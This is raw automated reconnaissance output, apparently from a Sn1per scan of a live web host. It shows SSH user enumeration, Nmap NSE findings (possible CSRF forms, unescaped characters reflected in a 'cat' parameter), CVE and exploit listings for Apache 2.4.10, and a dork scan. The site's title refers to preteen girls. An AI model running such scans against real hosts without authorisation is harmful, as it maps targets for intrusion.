9634[+] 185.82.200.52:22 - SSH - User 'ftp' found
9635[*] Scanned 1 of 1 hosts (100% complete)
9636[*] Auxiliary module execution completed
9637#######################################################################################################################################
9638Starting Nmap 7.80 ( https://nmap.org ) at 2019-10-06 00:20 EDT
9639NSE: Loaded 164 scripts for scanning.
9640NSE: Script Pre-scanning.
9641Initiating NSE at 00:20
9642Completed NSE at 00:20, 0.00s elapsed
9643Initiating NSE at 00:20
9644Completed NSE at 00:20, 0.00s elapsed
9645Initiating Parallel DNS resolution of 1 host. at 00:20
9646Completed Parallel DNS resolution of 1 host. at 00:20, 0.02s elapsed
9647Initiating SYN Stealth Scan at 00:20
9648Scanning www.ygmt.info (185.82.200.52) [1 port]
9649Discovered open port 80/tcp on 185.82.200.52
9650Completed SYN Stealth Scan at 00:20, 0.13s elapsed (1 total ports)
9651Initiating Service scan at 00:20
9652Scanning 1 service on www.ygmt.info (185.82.200.52)
9653Completed Service scan at 00:20, 6.30s elapsed (1 service on 1 host)
9654Initiating OS detection (try #1) against www.ygmt.info (185.82.200.52)
9655Retrying OS detection (try #2) against www.ygmt.info (185.82.200.52)
9656Initiating Traceroute at 00:21
9657Completed Traceroute at 00:21, 0.19s elapsed
9658Initiating Parallel DNS resolution of 14 hosts. at 00:21
9659Completed Parallel DNS resolution of 14 hosts. at 00:21, 0.22s elapsed
9660NSE: Script scanning 185.82.200.52.
9661Initiating NSE at 00:21
9662Completed NSE at 00:21, 57.33s elapsed
9663Initiating NSE at 00:21
9664Completed NSE at 00:21, 0.54s elapsed
9665Nmap scan report for www.ygmt.info (185.82.200.52)
9666Host is up (0.12s latency).
9667rDNS record for 185.82.200.52: latina.petite.guru
9668
PORT STATE SERVICE VERSION
80/tcp open http Apache httpd 2.4.10 ((Debian))
9671| http-brute:
9672|_ Path "/" does not require authentication
9673|_http-chrono: Request times for /; avg: 912.75ms; min: 698.36ms; max: 1271.96ms
9674| http-csrf:
9675| Spidering limited to: maxdepth=3; maxpagecount=20; withinhost=www.ygmt.info
9676| Found the following possible CSRF vulnerabilities:
9677|
9678| Path: http://www.ygmt.info:80/top50/index.php
9679| Form id:
9680| Form action: index.php
9681|
9682| Path: http://www.ygmt.info:80/top50/index.php
9683| Form id:
9684| Form action: index.php
9685|
9686| Path: http://www.ygmt.info:80/top50/index.php?cat=Book+Stores
9687| Form id:
9688| Form action: index.php
9689|
9690| Path: http://www.ygmt.info:80/top50/index.php?cat=Book+Stores
9691| Form id:
9692| Form action: index.php
9693|
9694| Path: http://www.ygmt.info:80/top50/index.php?a=stats&u=87
9695| Form id:
9696| Form action: index.php
9697|
9698| Path: http://www.ygmt.info:80/top50/index.php?a=stats&u=87
9699| Form id:
9700| Form action: index.php
9701|
9702| Path: http://www.ygmt.info:80/top50/index.php?method=in&cat=Nonude+Sites&start=1
9703| Form id:
9704| Form action: index.php
9705|
9706| Path: http://www.ygmt.info:80/top50/index.php?method=in&cat=Nonude+Sites&start=1
9707| Form id:
9708| Form action: index.php
9709|
9710| Path: http://www.ygmt.info:80/top50/index.php?a=stats&u=7
9711| Form id:
9712| Form action: index.php
9713|
9714| Path: http://www.ygmt.info:80/top50/index.php?a=stats&u=7
9715| Form id:
9716| Form action: index.php
9717|
9718| Path: http://www.ygmt.info:80/top50/index.php?method=in&cat=Security&start=1
9719| Form id:
9720| Form action: index.php
9721|
9722| Path: http://www.ygmt.info:80/top50/index.php?method=in&cat=Security&start=1
9723| Form id:
9724| Form action: index.php
9725|
9726| Path: http://www.ygmt.info:80/top50/index.php?a=stats&u=39
9727| Form id:
9728| Form action: index.php
9729|
9730| Path: http://www.ygmt.info:80/top50/index.php?a=stats&u=39
9731| Form id:
9732| Form action: index.php
9733|
9734| Path: http://www.ygmt.info:80/top50/index.php?a=stats&u=80
9735| Form id:
9736| Form action: index.php
9737|
9738| Path: http://www.ygmt.info:80/top50/index.php?a=stats&u=80
9739| Form id:
9740| Form action: index.php
9741|
9742| Path: http://www.ygmt.info:80/top50/index.php?method=in&cat=Top+Lists&start=1
9743| Form id:
9744| Form action: index.php
9745|
9746| Path: http://www.ygmt.info:80/top50/index.php?method=in&cat=Top+Lists&start=1
9747| Form id:
9748| Form action: index.php
9749|
9750| Path: http://www.ygmt.info:80/top50/index.php?a=stats&u=75
9751| Form id:
9752| Form action: index.php
9753|
9754| Path: http://www.ygmt.info:80/top50/index.php?a=stats&u=75
9755| Form id:
9756| Form action: index.php
9757|
9758| Path: http://www.ygmt.info:80/top50/index.php?cat=Pay+Sites
9759| Form id:
9760| Form action: index.php
9761|
9762| Path: http://www.ygmt.info:80/top50/index.php?cat=Pay+Sites
9763| Form id:
9764|_ Form action: index.php
9765|_http-date: Sun, 06 Oct 2019 04:21:00 GMT; -4s from local time.
9766|_http-devframework: Couldn't determine the underlying framework or CMS. Try increasing 'httpspider.maxpagecount' value to spider more pages.
9767|_http-dombased-xss: Couldn't find any DOM based XSS.
9768|_http-drupal-enum: Nothing found amongst the top 100 resources,use --script-args number=<number|all> for deeper analysis)
9769| http-errors:
9770| Spidering limited to: maxpagecount=40; withinhost=www.ygmt.info
9771| Found the following error pages:
9772|
9773| Error Code: 404
9774| http://www.ygmt.info:80/android-app:/
9775|
9776| Error Code: 404
9777| http://www.ygmt.info:80/top50/android-app:/
9778|
9779| Error Code: 404
9780| http://www.ygmt.info:80/url;
9781|
9782| Error Code: 404
9783|_ http://www.ygmt.info:80/top50/index.php?a=join
9784| http-feed:
9785| Spidering limited to: maxpagecount=40; withinhost=www.ygmt.info
9786| Found the following feeds:
9787|_ RSS (version 2.0): http://www.ygmt.info:80/top50/feed.php
9788|_http-fetch: Please enter the complete path of the directory to save data in.
9789| http-headers:
9790| Date: Sun, 06 Oct 2019 04:21:05 GMT
9791| Server: Apache/2.4.10 (Debian)
9792| Last-Modified: Wed, 13 Mar 2019 00:18:15 GMT
9793| ETag: "a0d-583eebde65fc0"
9794| Accept-Ranges: bytes
9795| Content-Length: 2573
9796| Vary: Accept-Encoding
9797| Connection: close
9798| Content-Type: text/html
9799|
9800|_ (Request type: HEAD)
9801|_http-jsonp-detection: Couldn't find any JSONP endpoints.
9802|_http-litespeed-sourcecode-download: Request with null byte did not work. This web server might not be vulnerable
9803| http-methods:
9804|_ Supported Methods: GET HEAD POST OPTIONS
9805|_http-mobileversion-checker: No mobile version detected.
9806| http-php-version: Logo query returned unknown hash ee8cc4afcc21c18aee24a4fe866484d4
9807|_Credits query returned unknown hash ee8cc4afcc21c18aee24a4fe866484d4
9808|_http-security-headers:
9809|_http-server-header: Apache/2.4.10 (Debian)
9810| http-sitemap-generator:
9811| Directory structure:
9812| /
9813| Other: 1
9814| /banner/
9815| jpg: 3
9816| /bn/
9817| jpg: 1; png: 1
9818| /top50/
9819| php: 1
9820| /top50/css/
9821| css: 1
9822| /top50/js/
9823| js: 1
9824| /top50/skins/photo50/
9825| png: 1
9826| Longest directory structure:
9827| Depth: 3
9828| Dir: /top50/skins/photo50/
9829| Total files found (by extension):
9830|_ Other: 1; css: 1; jpg: 4; js: 1; php: 1; png: 2
9831|_http-stored-xss: Couldn't find any stored XSS vulnerabilities.
9832|_http-title: Books, videos, photos, fiction and non-fiction of and about yo...
9833| http-unsafe-output-escaping:
9834| Characters [> " '] reflected in parameter cat at http://www.ygmt.info:80/top50/index.php?cat=Book+Stores
9835| Characters [> " '] reflected in parameter cat at http://www.ygmt.info:80/top50/index.php?method=in&cat=Nonude+Sites&start=1
9836| Characters [> " '] reflected in parameter cat at http://www.ygmt.info:80/top50/index.php?method=in&cat=Security&start=1
9837| Characters [> " '] reflected in parameter cat at http://www.ygmt.info:80/top50/index.php?method=in&cat=Top+Lists&start=1
9838|_ Characters [> " '] reflected in parameter cat at http://www.ygmt.info:80/top50/index.php?cat=Pay+Sites
9839| http-vhosts:
9840|_127 names had status 200
9841|_http-wordpress-enum: Nothing found amongst the top 100 resources,use --script-args search-limit=<number|all> for deeper analysis)
9842|_http-wordpress-users: [Error] Wordpress installation was not found. We couldn't find wp-login.php
9843|_http-xssed: No previously reported XSS vuln.
9844| vulners:
9845| cpe:/a:apache:http_server:2.4.10:
9846| CVE-2017-7679 7.5 https://vulners.com/cve/CVE-2017-7679
9847| CVE-2017-7668 7.5 https://vulners.com/cve/CVE-2017-7668
9848| CVE-2017-3169 7.5 https://vulners.com/cve/CVE-2017-3169
9849| CVE-2017-3167 7.5 https://vulners.com/cve/CVE-2017-3167
9850| CVE-2018-1312 6.8 https://vulners.com/cve/CVE-2018-1312
9851| CVE-2017-15715 6.8 https://vulners.com/cve/CVE-2017-15715
9852| CVE-2017-9788 6.4 https://vulners.com/cve/CVE-2017-9788
9853| CVE-2019-10098 5.8 https://vulners.com/cve/CVE-2019-10098
9854| CVE-2019-0220 5.0 https://vulners.com/cve/CVE-2019-0220
9855| CVE-2018-17199 5.0 https://vulners.com/cve/CVE-2018-17199
9856| CVE-2017-9798 5.0 https://vulners.com/cve/CVE-2017-9798
9857| CVE-2017-15710 5.0 https://vulners.com/cve/CVE-2017-15710
9858| CVE-2016-8743 5.0 https://vulners.com/cve/CVE-2016-8743
9859| CVE-2016-2161 5.0 https://vulners.com/cve/CVE-2016-2161
9860| CVE-2016-0736 5.0 https://vulners.com/cve/CVE-2016-0736
9861| CVE-2014-3583 5.0 https://vulners.com/cve/CVE-2014-3583
9862| CVE-2019-10092 4.3 https://vulners.com/cve/CVE-2019-10092
9863| CVE-2016-4975 4.3 https://vulners.com/cve/CVE-2016-4975
9864| CVE-2015-3185 4.3 https://vulners.com/cve/CVE-2015-3185
9865| CVE-2014-8109 4.3 https://vulners.com/cve/CVE-2014-8109
9866| CVE-2018-1283 3.5 https://vulners.com/cve/CVE-2018-1283
9867|_ CVE-2016-8612 3.3 https://vulners.com/cve/CVE-2016-8612
9868| vulscan: VulDB - https://vuldb.com:
9869| [68575] Apache HTTP Server up to 2.4.10 LuaAuthzProvider mod_lua.c privilege escalation
9870| [68435] Apache HTTP Server 2.4.10 mod_proxy_fcgi.c handle_headers denial of service
9871| [88747] Apache HTTP Server 2.4.17/2.4.18 mod_http2 denial of service
9872| [76731] Apache HTTP Server 2.4.12 ErrorDocument 400 Crash denial of service
9873| [74367] Apache HTTP Server up to 2.4.12 mod_lua lua_request.c wsupgrade denial of service
9874| [13300] Apache HTTP Server 2.4.1/2.4.2 mod_wsgi setuid privilege escalation
9875| [13299] Apache HTTP Server 2.4.1/2.4.2 mod_wsgi Content-Type Header information disclosure
9876|
9877| MITRE CVE - https://cve.mitre.org:
9878| [CVE-2013-2249] mod_session_dbd.c in the mod_session_dbd module in the Apache HTTP Server before 2.4.5 proceeds with save operations for a session without considering the dirty flag and the requirement for a new session ID, which has unspecified impact and remote attack vectors.
9879| [CVE-2012-4558] Multiple cross-site scripting (XSS) vulnerabilities in the balancer_handler function in the manager interface in mod_proxy_balancer.c in the mod_proxy_balancer module in the Apache HTTP Server 2.2.x before 2.2.24-dev and 2.4.x before 2.4.4 allow remote attackers to inject arbitrary web script or HTML via a crafted string.
9880| [CVE-2012-3502] The proxy functionality in (1) mod_proxy_ajp.c in the mod_proxy_ajp module and (2) mod_proxy_http.c in the mod_proxy_http module in the Apache HTTP Server 2.4.x before 2.4.3 does not properly determine the situations that require closing a back-end connection, which allows remote attackers to obtain sensitive information in opportunistic circumstances by reading a response that was intended for a different client.
9881| [CVE-2012-3499] Multiple cross-site scripting (XSS) vulnerabilities in the Apache HTTP Server 2.2.x before 2.2.24-dev and 2.4.x before 2.4.4 allow remote attackers to inject arbitrary web script or HTML via vectors involving hostnames and URIs in the (1) mod_imagemap, (2) mod_info, (3) mod_ldap, (4) mod_proxy_ftp, and (5) mod_status modules.
9882| [CVE-2012-3451] Apache CXF before 2.4.9, 2.5.x before 2.5.5, and 2.6.x before 2.6.2 allows remote attackers to execute unintended web-service operations by sending a header with a SOAP Action String that is inconsistent with the message body.
9883| [CVE-2012-2687] Multiple cross-site scripting (XSS) vulnerabilities in the make_variant_list function in mod_negotiation.c in the mod_negotiation module in the Apache HTTP Server 2.4.x before 2.4.3, when the MultiViews option is enabled, allow remote attackers to inject arbitrary web script or HTML via a crafted filename that is not properly handled during construction of a variant list.
9884| [CVE-2012-2379] Apache CXF 2.4.x before 2.4.8, 2.5.x before 2.5.4, and 2.6.x before 2.6.1, when a Supporting Token specifies a child WS-SecurityPolicy 1.1 or 1.2 policy, does not properly ensure that an XML element is signed or encrypted, which has unspecified impact and attack vectors.
9885| [CVE-2012-2378] Apache CXF 2.4.5 through 2.4.7, 2.5.1 through 2.5.3, and 2.6.x before 2.6.1, does not properly enforce child policies of a WS-SecurityPolicy 1.1 SupportingToken policy on the client side, which allows remote attackers to bypass the (1) AlgorithmSuite, (2) SignedParts, (3) SignedElements, (4) EncryptedParts, and (5) EncryptedElements policies.
9886| [CVE-2012-0883] envvars (aka envvars-std) in the Apache HTTP Server before 2.4.2 places a zero-length directory name in the LD_LIBRARY_PATH, which allows local users to gain privileges via a Trojan horse DSO in the current working directory during execution of apachectl.
9887| [CVE-2011-2516] Off-by-one error in the XML signature feature in Apache XML Security for C++ 1.6.0, as used in Shibboleth before 2.4.3 and possibly other products, allows remote attackers to cause a denial of service (crash) via a signature using a large RSA key, which triggers a buffer overflow.
9888|
9889| SecurityFocus - https://www.securityfocus.com/bid/:
9890| [42102] Apache 'mod_proxy_http' 2.2.9 for Unix Timeout Handling Information Disclosure Vulnerability
9891| [27237] Apache HTTP Server 2.2.6, 2.0.61 and 1.3.39 'mod_status' Cross-Site Scripting Vulnerability
9892| [15413] PHP Apache 2 Virtual() Safe_Mode and Open_Basedir Restriction Bypass Vulnerability
9893| [15177] PHP Apache 2 Local Denial of Service Vulnerability
9894| [6065] Apache 2 WebDAV CGI POST Request Information Disclosure Vulnerability
9895| [5816] Apache 2 mod_dav Denial Of Service Vulnerability
9896| [5486] Apache 2.0 CGI Path Disclosure Vulnerability
9897| [5485] Apache 2.0 Path Disclosure Vulnerability
9898| [5434] Apache 2.0 Encoded Backslash Directory Traversal Vulnerability
9899| [5256] Apache httpd 2.0 CGI Error Path Disclosure Vulnerability
9900| [4057] Apache 2 for Windows OPTIONS request Path Disclosure Vulnerability
9901| [4056] Apache 2 for Windows php.exe Path Disclosure Vulnerability
9902|
9903| IBM X-Force - https://exchange.xforce.ibmcloud.com:
9904| [75211] Debian GNU/Linux apache 2 cross-site scripting
9905|
9906| Exploit-DB - https://www.exploit-db.com:
9907| [31052] Apache <= 2.2.6 'mod_negotiation' HTML Injection and HTTP Response Splitting Vulnerability
9908| [30901] Apache HTTP Server 2.2.6 Windows Share PHP File Extension Mapping Information Disclosure Vulnerability
9909| [30835] Apache HTTP Server <= 2.2.4 413 Error HTTP Request Method Cross-Site Scripting Weakness
9910| [28424] Apache 2.x HTTP Server Arbitrary HTTP Request Headers Security Weakness
9911| [28365] Apache 2.2.2 CGI Script Source Code Information Disclosure Vulnerability
9912| [27915] Apache James 2.2 SMTP Denial of Service Vulnerability
9913| [27135] Apache Struts 2 DefaultActionMapper Prefixes OGNL Code Execution
9914| [26710] Apache CXF prior to 2.5.10, 2.6.7 and 2.7.4 - Denial of Service
9915| [24590] Apache 2.0.x mod_ssl Remote Denial of Service Vulnerability
9916| [23581] Apache 2.0.4x mod_perl Module File Descriptor Leakage Vulnerability
9917| [23482] Apache 2.0.4x mod_php Module File Descriptor Leakage Vulnerability (2)
9918| [23481] Apache 2.0.4x mod_php Module File Descriptor Leakage Vulnerability (1)
9919| [23296] Red Hat Apache 2.0.40 Directory Index Default Configuration Error
9920| [23282] apache cocoon 2.14/2.2 - Directory Traversal vulnerability
9921| [22191] Apache Web Server 2.0.x MS-DOS Device Name Denial of Service Vulnerability
9922| [21854] Apache 2.0.39/40 Oversized STDERR Buffer Denial of Service Vulnerability
9923| [21719] Apache 2.0 Path Disclosure Vulnerability
9924| [21697] Apache 2.0 Encoded Backslash Directory Traversal Vulnerability
9925| [20272] Apache 1.2.5/1.3.1,UnityMail 2.0 MIME Header DoS Vulnerability
9926| [19828] Cobalt RaQ 2.0/3.0 Apache .htaccess Disclosure Vulnerability
9927| [18984] Apache Struts <= 2.2.1.1 - Remote Command Execution
9928| [18329] Apache Struts2 <= 2.3.1 - Multiple Vulnerabilities
9929| [17691] Apache Struts < 2.2.0 - Remote Command Execution
9930| [15319] Apache 2.2 (Windows) Local Denial of Service
9931| [14617] Apache JackRabbit 2.0.0 webapp XPath Injection
9932| [11650] Apache 2.2.14 mod_isapi Dangling Pointer Remote SYSTEM Exploit
9933| [8458] Apache Geronimo <= 2.1.3 - Multiple Directory Traversal Vulnerabilities
9934| [5330] Apache 2.0 mod_jk2 2.0.2 - Remote Buffer Overflow Exploit (win32)
9935| [3996] Apache 2.0.58 mod_rewrite Remote Overflow Exploit (win2k3)
9936| [2237] Apache < 1.3.37, 2.0.59, 2.2.3 (mod_rewrite) Remote Overflow PoC
9937| [1056] Apache <= 2.0.49 Arbitrary Long HTTP Headers Denial of Service
9938| [855] Apache <= 2.0.52 HTTP GET request Denial of Service Exploit
9939| [132] Apache 1.3.x - 2.0.48 - mod_userdir Remote Users Disclosure Exploit
9940| [38] Apache <= 2.0.45 APR Remote Exploit -Apache-Knacker.pl
9941| [34] Webfroot Shoutbox < 2.32 (Apache) Remote Exploit
9942| [11] Apache <= 2.0.44 Linux Remote Denial of Service Exploit
9943| [9] Apache HTTP Server 2.x Memory Leak Exploit
9944|
9945| OpenVAS (Nessus) - http://www.openvas.org:
9946| [855524] Solaris Update for Apache 2 120544-14
9947| [855077] Solaris Update for Apache 2 120543-14
9948| [100858] Apache 'mod_proxy_http' 2.2.9 for Unix Timeout Handling Information Disclosure Vulnerability
9949| [72626] Debian Security Advisory DSA 2579-1 (apache2)
9950| [71551] Gentoo Security Advisory GLSA 201206-25 (apache)
9951| [71550] Gentoo Security Advisory GLSA 201206-24 (apache tomcat)
9952| [71485] Debian Security Advisory DSA 2506-1 (libapache-mod-security)
9953| [71256] Debian Security Advisory DSA 2452-1 (apache2)
9954| [71238] Debian Security Advisory DSA 2436-1 (libapache2-mod-fcgid)
9955| [70724] Debian Security Advisory DSA 2405-1 (apache2)
9956| [70235] Debian Security Advisory DSA 2298-2 (apache2)
9957| [70233] Debian Security Advisory DSA 2298-1 (apache2)
9958| [69988] Debian Security Advisory DSA 2279-1 (libapache2-mod-authnz-external)
9959| [69338] Debian Security Advisory DSA 2202-1 (apache2)
9960| [65131] SLES9: Security update for Apache 2 oes/CORE
9961| [64426] Gentoo Security Advisory GLSA 200907-04 (apache)
9962| [61381] Gentoo Security Advisory GLSA 200807-06 (apache)
9963| [60582] Gentoo Security Advisory GLSA 200803-19 (apache)
9964| [58745] Gentoo Security Advisory GLSA 200711-06 (apache)
9965| [57851] Gentoo Security Advisory GLSA 200608-01 (apache)
9966| [56246] Gentoo Security Advisory GLSA 200602-03 (Apache)
9967| [55392] Gentoo Security Advisory GLSA 200509-12 (Apache)
9968| [55129] Gentoo Security Advisory GLSA 200508-15 (apache)
9969| [54739] Gentoo Security Advisory GLSA 200411-18 (apache)
9970| [54724] Gentoo Security Advisory GLSA 200411-03 (apache)
9971| [54712] Gentoo Security Advisory GLSA 200410-21 (apache)
9972| [54689] Gentoo Security Advisory GLSA 200409-33 (net=www/apache)
9973| [54677] Gentoo Security Advisory GLSA 200409-21 (apache)
9974| [54610] Gentoo Security Advisory GLSA 200407-03 (Apache)
9975| [54601] Gentoo Security Advisory GLSA 200406-16 (Apache)
9976| [54590] Gentoo Security Advisory GLSA 200406-05 (Apache)
9977| [54582] Gentoo Security Advisory GLSA 200405-22 (Apache)
9978| [54529] Gentoo Security Advisory GLSA 200403-04 (Apache)
9979| [54499] Gentoo Security Advisory GLSA 200310-04 (Apache)
9980| [54498] Gentoo Security Advisory GLSA 200310-03 (Apache)
9981| [11092] Apache 2.0.39 Win32 directory traversal
9982| [66081] SLES11: Security update for Apache 2
9983| [66074] SLES10: Security update for Apache 2
9984| [66070] SLES9: Security update for Apache 2
9985| [65893] SLES10: Security update for Apache 2
9986| [65888] SLES10: Security update for Apache 2
9987| [65510] SLES9: Security update for Apache 2
9988| [65249] SLES9: Security update for Apache 2
9989| [65230] SLES9: Security update for Apache 2
9990| [65228] SLES9: Security update for Apache 2
9991| [65207] SLES9: Security update for Apache 2
9992| [65136] SLES9: Security update for Apache 2
9993| [65017] SLES9: Security update for Apache 2
9994|
9995| SecurityTracker - https://www.securitytracker.com:
9996| [1008196] Apache 2.x on Windows May Return Unexpected Files For URLs Ending With Certain Characters
9997| [1007143] Apache 2.0 Web Server May Use a Weaker Encryption Implementation Than Specified in Some Cases
9998| [1006444] Apache 2.0 Web Server Line Feed Buffer Allocation Flaw Lets Remote Users Deny Service
9999| [1005963] Apache Web Server 2.x Windows Device Access Flaw Lets Remote Users Crash the Server or Possibly Execute Arbitrary Code
10000| [1004770] Apache 2.x Web Server ap_log_rerror() Function May Disclose Full Installation Path to Remote Users
10001|
10002| OSVDB - http://www.osvdb.org:
10003| [20897] PHP w/ Apache 2 SAPI virtual() Function Unspecified INI Setting Disclosure
10004|_
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Device type: general purpose|broadband router|WAP|webcam
Running (JUST GUESSING): Linux 2.6.X|3.X|2.4.X (95%), Asus embedded (94%), AXIS embedded (94%)
OS CPE: cpe:/o:linux:linux_kernel:2.6 cpe:/o:linux:linux_kernel:3 cpe:/h:asus:rt-ac66u cpe:/h:asus:rt-n10 cpe:/h:axis:211_network_camera cpe:/o:linux:linux_kernel:2.6.20 cpe:/o:linux:linux_kernel:2.4 cpe:/o:linux:linux_kernel:3.8
Aggressive OS guesses: Linux 2.6.32 - 3.10 (95%), Linux 2.6.32 - 3.9 (95%), Linux 3.0 - 3.1 (94%), Asus RT-AC66U router (Linux 2.6) (94%), Asus RT-N10 router or AXIS 211A Network Camera (Linux 2.6) (94%), Linux 2.6.18 (94%), Asus RT-N16 WAP (Linux 2.6) (94%), Asus RT-N66U WAP (Linux 2.6) (94%), Tomato 1.28 (Linux 2.6.22) (94%), AXIS 211A Network Camera (Linux 2.6.20) (94%)
No exact OS matches for host (test conditions non-ideal).
Uptime guess: 30.012 days (since Fri Sep 6 00:04:24 2019)
Network Distance: 14 hops
TCP Sequence Prediction: Difficulty=258 (Good luck!)
IP ID Sequence Generation: All zeros

TRACEROUTE (using port 80/tcp)
HOP RTT       ADDRESS
1   46.10 ms  10.246.204.1
2   46.19 ms  vlan102.as02.qc1.ca.m247.com (176.113.74.17)
3   71.26 ms  irb-0.agg1.qc1.ca.m247.com (37.120.128.168)
4   71.25 ms  te-1-5-2-0.bb1.fra2.de.m247.com (82.102.29.44)
5   54.98 ms  te0-0-0-3.rcr21.ymq02.atlas.cogentco.com (38.104.155.233)
6   55.03 ms  be2089.ccr21.ymq01.atlas.cogentco.com (154.54.45.113)
7   132.05 ms be3043.ccr22.lpl01.atlas.cogentco.com (154.54.44.165)
8   132.10 ms be2182.ccr41.ams03.atlas.cogentco.com (154.54.77.245)
9   132.13 ms be3433.rcr21.ams06.atlas.cogentco.com (154.54.58.202)
10  149.74 ms worldstream.demarc.cogentco.com (149.14.93.74)
11  149.79 ms 109.236.95.183
12  132.27 ms 190.2.158.153
13  132.25 ms 185.106.120.66
14  132.34 ms latina.petite.guru (185.82.200.52)
10032
10033NSE: Script Post-scanning.
10034Initiating NSE at 00:21
10035Completed NSE at 00:21, 0.00s elapsed
10036Initiating NSE at 00:21
10037Completed NSE at 00:21, 0.00s elapsed
10038#####################################################################################################################################
10039http://www.ygmt.info [200 OK] Apache[2.4.10], HTTPServer[Debian Linux][Apache/2.4.10 (Debian)], IP[185.82.200.52], Script[JavaScript], Title[Books, videos, photos, fiction and non-fiction of and about young girls under 16 preteen models], X-UA-Compatible[IE=edge]
10040######################################################################################################################################
10041
10042wig - WebApp Information Gatherer
10043
10044
10045Scanning http://www.ygmt.info...
10046________________________ SITE INFO _________________________
10047IP Title
10048185.82.200.52 Books, videos, photos, fiction and non-fic
10049
10050_________________________ VERSION __________________________
10051Name Versions Type
10052Apache 2.4.10 Platform
10053Debian 8.0 | 8.0 (pre-release) OS
10054
10055____________________________________________________________
10056Time: 30.6 sec Urls: 809 Fingerprints: 40401
10057######################################################################################################################################
10058HTTP/1.1 200 OK
10059Date: Sun, 06 Oct 2019 04:22:31 GMT
10060Server: Apache/2.4.10 (Debian)
10061Last-Modified: Wed, 13 Mar 2019 00:18:15 GMT
10062ETag: "a0d-583eebde65fc0"
10063Accept-Ranges: bytes
10064Content-Length: 2573
10065Vary: Accept-Encoding
10066Content-Type: text/html
10067
10068HTTP/1.1 200 OK
10069Date: Sun, 06 Oct 2019 04:22:32 GMT
10070Server: Apache/2.4.10 (Debian)
10071Last-Modified: Wed, 13 Mar 2019 00:18:15 GMT
10072ETag: "a0d-583eebde65fc0"
10073Accept-Ranges: bytes
10074Content-Length: 2573
10075Vary: Accept-Encoding
10076Content-Type: text/html
10077
10078Allow: GET,HEAD,POST,OPTIONS
10079#####################################################################################################################################
10080------------------------------------------------------------------------------------------------------------------------
10081
10082[ ! ] Starting SCANNER INURLBR 2.1 at [06-10-2019 00:22:55]
10083[ ! ] legal disclaimer: Usage of INURLBR for attacking targets without prior mutual consent is illegal.
10084It is the end user's responsibility to obey all applicable local, state and federal laws.
10085Developers assume no liability and are not responsible for any misuse or damage caused by this program
10086
10087[ INFO ][ OUTPUT FILE ]:: [ /usr/share/sniper/loot/workspace/www.ygmt.info/output/inurlbr-www.ygmt.info ]
10088[ INFO ][ DORK ]::[ site:www.ygmt.info ]
10089[ INFO ][ SEARCHING ]:: {
10090[ INFO ][ ENGINE ]::[ GOOGLE - www.google.ws ]
10091
10092[ INFO ][ SEARCHING ]::
10094[ INFO ][ ENGINE ]::[ GOOGLE API ]
10095
10096[ INFO ][ SEARCHING ]::
10098[ INFO ][ ENGINE ]::[ GOOGLE_GENERIC_RANDOM - www.google.com.mx ID: 005911257635119896548:iiolgmwf2se ]
10099
10100[ INFO ][ SEARCHING ]::
10102
10103[ INFO ][ TOTAL FOUND VALUES ]:: [ 100 ]
10104
10105
10106 _[ - ]::--------------------------------------------------------------------------------------------------------------
10107|_[ + ] [ 0 / 100 ]-[00:23:08] [ - ]
10108|_[ + ] Target:: [ http://www.ygmt.info/top50/index.php?a=stats ]
10109|_[ + ] Exploit::
10110|_[ + ] Information Server:: HTTP/1.1 200 OK, Server: Apache/2.4.10 (Debian) , IP:185.82.200.52:80
10111|_[ + ] More details:: / - / , ISP:
10112|_[ + ] Found:: UNIDENTIFIED
10113
10114 _[ - ]::--------------------------------------------------------------------------------------------------------------
10115|_[ + ] [ 1 / 100 ]-[00:23:08] [ - ]
10116|_[ + ] Target:: [ http://www.ygmt.info/top50/index.php?cat=Free Sites ]
10117|_[ + ] Exploit::
10118|_[ + ] Information Server:: HTTP/1.1 400 Bad Request, Server: Apache/2.4.10 (Debian) , IP:185.82.200.52:80
10119|_[ + ] More details:: / - / , ISP:
10120|_[ + ] Found:: UNIDENTIFIED
10121
10122 _[ - ]::--------------------------------------------------------------------------------------------------------------
10123|_[ + ] [ 2 / 100 ]-[00:23:09] [ - ]
10124|_[ + ] Target:: [ http://www.ygmt.info/top50/index.php?a=stats&u=68 ]
10125|_[ + ] Exploit::
10126|_[ + ] Information Server:: HTTP/1.1 200 OK, Server: Apache/2.4.10 (Debian) , IP:185.82.200.52:80
10127|_[ + ] More details:: / - / , ISP:
10128|_[ + ] Found:: UNIDENTIFIED
10129
10130 _[ - ]::--------------------------------------------------------------------------------------------------------------
10131|_[ + ] [ 3 / 100 ]-[00:23:09] [ - ]
10132|_[ + ] Target:: [ http://www.ygmt.info/top50/index.php?a=stats&u=40 ]
10133|_[ + ] Exploit::
10134|_[ + ] Information Server:: HTTP/1.1 200 OK, Server: Apache/2.4.10 (Debian) , IP:185.82.200.52:80
10135|_[ + ] More details:: / - / , ISP:
10136|_[ + ] Found:: UNIDENTIFIED
10137
10138 _[ - ]::--------------------------------------------------------------------------------------------------------------
10139|_[ + ] [ 4 / 100 ]-[00:23:10] [ - ]
10140|_[ + ] Target:: [ http://www.ygmt.info/top50/index.php?a=stats&u=38 ]
10141|_[ + ] Exploit::
10142|_[ + ] Information Server:: HTTP/1.1 200 OK, Server: Apache/2.4.10 (Debian) , IP:185.82.200.52:80
10143|_[ + ] More details:: / - / , ISP:
10144|_[ + ] Found:: UNIDENTIFIED
10145
10146 _[ - ]::--------------------------------------------------------------------------------------------------------------
10147|_[ + ] [ 5 / 100 ]-[00:23:11] [ - ]
10148|_[ + ] Target:: [ http://www.ygmt.info/top50/index.php?a=stats&u=108 ]
10149|_[ + ] Exploit::
10150|_[ + ] Information Server:: HTTP/1.1 200 OK, Server: Apache/2.4.10 (Debian) , IP:185.82.200.52:80
10151|_[ + ] More details:: / - / , ISP:
10152|_[ + ] Found:: UNIDENTIFIED
10153
10154 _[ - ]::--------------------------------------------------------------------------------------------------------------
10155|_[ + ] [ 6 / 100 ]-[00:23:12] [ - ]
10156|_[ + ] Target:: [ http://www.ygmt.info/top50/index.php?a=stats&u=63 ]
10157|_[ + ] Exploit::
10158|_[ + ] Information Server:: HTTP/1.1 200 OK, Server: Apache/2.4.10 (Debian) , IP:185.82.200.52:80
10159|_[ + ] More details:: / - / , ISP:
10160|_[ + ] Found:: UNIDENTIFIED
10161
10162 _[ - ]::--------------------------------------------------------------------------------------------------------------
10163|_[ + ] [ 7 / 100 ]-[00:23:12] [ - ]
10164|_[ + ] Target:: [ http://www.ygmt.info/top50/index.php?a=stats&u=93 ]
10165|_[ + ] Exploit::
10166|_[ + ] Information Server:: HTTP/1.1 200 OK, Server: Apache/2.4.10 (Debian) , IP:185.82.200.52:80
